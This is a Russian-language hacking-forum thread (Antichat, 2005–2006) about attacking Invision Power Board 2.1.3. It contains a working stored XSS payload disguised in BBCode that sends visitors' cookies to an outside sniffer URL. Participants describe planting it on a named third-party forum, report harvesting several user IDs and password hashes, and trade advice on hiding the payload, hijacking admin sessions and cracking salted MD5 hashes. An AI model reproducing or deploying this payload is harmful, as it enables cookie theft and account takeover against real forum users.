Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос про уязвимости в IPB v2.1.3 (https://forum.antichat.xyz/showthread.php?t=12259)

Destroyer 28.12.2005 19:26

Вопрос про уязвимости в IPB v2.1.3
 
Не подскажите какие уязвимости присутствуют в Invision Power Board (Free Trial) v2.1.3 © 2005 а то ни где не нашёл!

1251soldier 28.12.2005 21:12

Код HTML:

[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Ploho ishesh

Destroyer 28.12.2005 21:22

Спасибо попробую

Diablo 31.12.2005 18:54

А как от этого защитится ?

Arthas 01.01.2006 17:36

ребята, вставляю хеш и ид админа в куки (речь идет о ипб 2.1.3) но всё ровно не могу зайти под админом, хотя в ипб 1.3 всё отлично работает. в чём дело не подскажете?

Grema 01.01.2006 21:26

Потому что в 2.х в админке еще раз проверяеться пасс...
тебе надо пасс админа а не кго куки.
а так как это 2.х ты не разшифруеш мд5 без соли...
разшифровывай и заходи в админку

Barsik 02.01.2006 00:14

Цитата:

Сообщение от Diablo
А как от этого защитится ?

Вроде выключить bb код

muse 03.01.2006 16:17

Цитата:

Сообщение от 1251soldier
Код HTML:

[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Ploho ishesh

narod objasnite plizz soderjimoe etogo koda
wj@wj - leviy email
http://www.wj.com - leviy url a za4em tam `=`?
nu dalwe vrode vse ponatno...
pasipa

FQziT 03.01.2006 16:25

` - это символ обратного апострофа, он является ограничителем атрибутов, но только в IE.

maXaTTAck 03.01.2006 17:14

Эти адреса не важны вообще: можешь поставить вместо их что-угодно.

GreenBear 03.01.2006 17:26

Цитата:

но всё ровно не могу зайти под админом,
там в админке можно включать привязку сессии к ипу и браузеру. по умолчанию привязка только к ипу, насколько я помню.

Kragen 05.01.2006 18:03

Цитата:

Сообщение от muse
narod objasnite plizz soderjimoe etogo koda
wj@wj - leviy email
http://www.wj.com - leviy url a za4em tam `=`?
nu dalwe vrode vse ponatno...
pasipa

Вот например мне нужно поместить этот код на форум:
http://forum.la2world.ru/index.php?showtopic=3208&st=40

Что должно быть написано в коде?

Замест wj@wj, мой е-майл, а замест етого:
http://www.wj.com`=`].com
что должно быть?

WizART 05.01.2006 18:07

Эээ...да тебе вообще ничего не надо заменять :))))) тебе просто код Джордана надо фтыкнуть и все ;) а далее смотри на логе сниффера, который указал, в коде Джордана это - http://antichat.ru/sniff/log.php и ищи свои данные (только сначала удостоверься, пашет ли вообще код :))

Kragen 05.01.2006 18:54

Здесь еще одна проблема...
Когда ставлю етот код, то в IE все норм, тоесть в сообщении ничего не отображается, НО в Opera отображается такое:
.com'>wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`

Можно ли ето как-нить убрать?

Kragen 05.01.2006 18:59

З.Ы. Код нормально пашет ))

D1mOn 05.01.2006 19:00

тока в осле работает!

WizART 05.01.2006 19:06

Цитата:

Сообщение от Kragen
З.Ы. Код нормально пашет ))

Если бы он работал, тогда бы это не писалось, значит маскируй цветом или размерами....

Kragen 05.01.2006 19:11

ОК, попробую, но код пашет, т.к. в ИЕ не отображается и на снифер пришло уже 3 ИД с хешами....
Еще вопрос... Можно-ли как-то добавить в пост с кодом, что-бы пост был не пустой, а там что-то отображалось? Я пробовал записять в начало, не получилось....

WizART 05.01.2006 19:14

Ну дак просто вставляешь скрипт, например:
[script] а потом текст!
и все - идет типо скрипт и текст, скрипт не видно а текст видно, мол ты просто запостил и все ;)

Kragen 05.01.2006 19:20

=) Щас попробуем...

Kragen 05.01.2006 19:28

М-да, через СКРИПТ не работает, просто выводит сам КОД =((

Kragen 05.01.2006 19:32

А если поставить КОД, как подпись... Он будет работать ?

D1mOn 05.01.2006 19:33

должен

1251soldier 05.01.2006 20:11

Kak ni stranno, no v podpisi ne kod ne rabotaet. X3 pochemu.

Romaxa55 05.01.2006 22:04

хмм, как я думаю, возможно фильтр админ поставил, нужнго смотреть, и пробвать методом тыка :)


Время: 15:21